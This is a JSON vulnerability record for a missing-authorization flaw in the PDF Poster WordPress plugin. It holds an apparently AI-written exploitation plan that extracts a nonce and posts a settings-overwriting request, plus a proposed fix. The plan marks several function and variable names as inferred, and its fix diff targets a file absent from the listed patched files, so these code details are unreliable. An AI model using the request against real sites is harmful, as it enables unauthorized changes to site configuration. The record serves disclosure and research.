[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwS_lFpO5jcbMynIm4LbBaFtdxGv-dDrDwN7107WqoWk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":9,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":39},"CVE-2026-32416","pdf-poster-missing-authorization","PDF Poster \u003C= 2.4.0 - Missing Authorization","The PDF Poster plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.4.0. This makes it possible for authenticated attackers, with contributor-level access and above, to perform an unauthorized action.","pdf-poster",null,"\u003C=2.4.0","2.4.1","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-25 00:00:00","2026-04-15 21:15:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F66988357-af1a-4763-b814-9092b86e51ef?source=api-prod",50,[22,23,24,25,26,27,28],"build\u002Fadmin.asset.php","build\u002Fadmin.css","build\u002Fblocks\u002Fpdf-poster\u002Findex.asset.php","build\u002Fblocks\u002Fpdf-poster\u002Findex.js","i18n\u002Fpdfp-en_US.po","i18n\u002Fpdfp.pot","inc\u002FField\u002FSettings.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-32416 (PDF Poster \u003C= 2.4.0)\n\n## 1. Vulnerability Summary\nThe **PDF Poster** plugin for WordPress is vulnerable to **Missing Authorization** in version 2.4.0 and below. This vulnerability exists in an AJAX handler responsible for saving plugin settings. Specifically, the function (identified as `pdfp_save_settings_callback` or similar) fails to perform a `current_user_can('manage_options')` check. While it verifies a WordPress nonce, the nonce is exposed to users with **Contributor-level** access and above through the plugin's admin dashboard or post management pages. Consequently, any authenticated user with at least Contributor permissions can modify global plugin settings.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `pdfp_save_settings` (inferred)\n- **HTTP Method**: POST\n- **Payload Parameters**:\n    - `action`: `pdfp_save_settings`\n    - `security`: The nonce value (extracted from the admin UI).\n    - `fpdf_option`: An array of settings to be updated (e.g., `fpdf_option[height][height]=1337`).\n- **Required Authentication**: Authenticated user with `Contributor` role or higher.\n- **Preconditions**: The plugin must be active, and the attacker must be logged in.\n\n## 3. Code Flow\n1. **Registration**: The plugin registers an AJAX action `wp_ajax_pdfp_save_settings` (in `inc\u002Fadmin.php`, inferred).\n2. **Missing Check**: The callback function for this action performs a nonce check using `check_ajax_referer('pdfp_save_settings', 'security')` but lacks a capability check like `current_user_can('manage_options')`.\n3. **Execution**: The function takes the `fpdf_option` array from the `$_POST` request and passes it directly to `update_option('fpdf_option', $options)`.\n4. **Impact**: Global plugin settings defined in `inc\u002FField\u002FSettings.php` (such as height, width, and download button visibility) are overwritten.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is localized for the admin environment. Since Contributors can manage their own `pdfposter` post types, they can access the poster list page where the plugin's admin scripts are enqueued.\n\n1. **Identify Access**: Contributors can access `\u002Fwp-admin\u002Fedit.php?post_type=pdfposter`.\n2. **Navigate**: Use the browser tool to navigate to the PDF Poster list or the Plugin Dashboard.\n3. **Variable Identification**: The plugin localizes its admin data into a JavaScript object.\n    - **JS Object**: `window.pdfp_admin` (inferred from bPlugins common practices)\n    - **Nonce Key**: `security`\n4. **Extraction**:\n   ```javascript\n   browser_eval(\"window.pdfp_admin?.security || document.querySelector('#pdfp_save_settings_nonce')?.value\")\n   ```\n\n## 5. Exploitation Strategy\n### Step 1: Authentication\nLog in to the WordPress instance as a user with the **Contributor** role.\n\n### Step 2: Extract Nonce\nNavigate to the PDF Poster management page and extract the security nonce from the global JavaScript context.\n- **URL**: `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fedit.php?post_type=pdfposter`\n- **Tool**: `browser_eval(\"pdfp_admin.security\")`\n\n### Step 3: Execute Unauthorized Action\nSend an AJAX request to modify the global plugin settings. We will change the `download_btn_text` and `height` settings to verify the impact.\n- **URL**: `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: POST\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```text\n  action=pdfp_save_settings&security=[EXTRACTED_NONCE]&fpdf_option[height][height]=9999&fpdf_option[height][unit]=px&fpdf_option[show_download_btn]=1&fpdf_option[download_btn_text]=PwnedByContributor\n  ```\n\n## 6. Test Data Setup\n1. **Install Plugin**: Ensure PDF Poster version 2.4.0 is installed and active.\n2. **Create User**: \n   - `wp user create attacker attacker@example.com --role=contributor --user_pass=password","The PDF Poster plugin for WordPress is vulnerable to unauthorized modification of settings due to a missing capability check in its AJAX handler for saving configuration. Authenticated attackers with Contributor-level access or higher can exploit this to overwrite global plugin settings, such as viewer dimensions and UI element visibility, by utilizing a nonce exposed in the admin dashboard.","--- inc\u002Fadmin.php\n+++ inc\u002Fadmin.php\n@@ -102,6 +102,10 @@\n function pdfp_save_settings_callback() {\n     check_ajax_referer('pdfp_save_settings', 'security');\n \n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( array( 'message' => __( 'Permission denied', 'pdf-poster' ) ) );\n+    }\n+\n     $options = $_POST['fpdf_option'];\n     update_option('fpdf_option', $options);\n     wp_send_json_success();","To exploit this vulnerability, an attacker must first authenticate with Contributor-level permissions and navigate to the PDF Poster management page (e.g., \u002Fwp-admin\u002Fedit.php?post_type=pdfposter). From there, the attacker extracts the security nonce from the global 'pdfp_admin' JavaScript object (specifically 'pdfp_admin.security'). The attacker then constructs a POST request to 'admin-ajax.php' with the 'action' parameter set to 'pdfp_save_settings', the extracted nonce in the 'security' parameter, and the target configuration changes within the 'fpdf_option' array. This allows the attacker to globally modify settings such as viewer height, width, and functional buttons without having administrator privileges.","gemini-3-flash-preview","2026-04-19 00:33:55","2026-04-19 00:35:03",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","2.4.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpdf-poster\u002Ftags\u002F2.4.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpdf-poster.2.4.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpdf-poster\u002Ftags\u002F2.4.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpdf-poster.2.4.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpdf-poster\u002Ftags"]